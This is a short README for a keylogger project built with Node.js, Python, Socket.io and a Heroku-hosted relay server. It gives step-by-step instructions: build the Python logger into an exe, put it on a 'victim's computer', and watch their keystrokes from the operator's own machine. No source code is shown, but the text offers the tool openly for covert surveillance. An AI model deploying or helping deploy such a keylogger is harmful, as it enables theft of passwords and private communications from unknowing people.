Node Keylogger is a keylogger program made with Node & Python
-
Upload server.js file to heroku and run it with
npm start
command. -
Fill
lib.json
file. Note:controllerServerURL
is your heroku app url -
Using a exe builder module like
pyinstaller
, build an exe file for logger.pyw -
Upload the exe file to the victim's computer and run it (double click)
-
Run client.js file on your own computer
npm run client
Now Keylogger system is on, you can get all keyboard activities of victim
- NodeJS
- Python
- Socket.io
- Socket.io-client
- Heroku (for hosting)
- Pynput module for python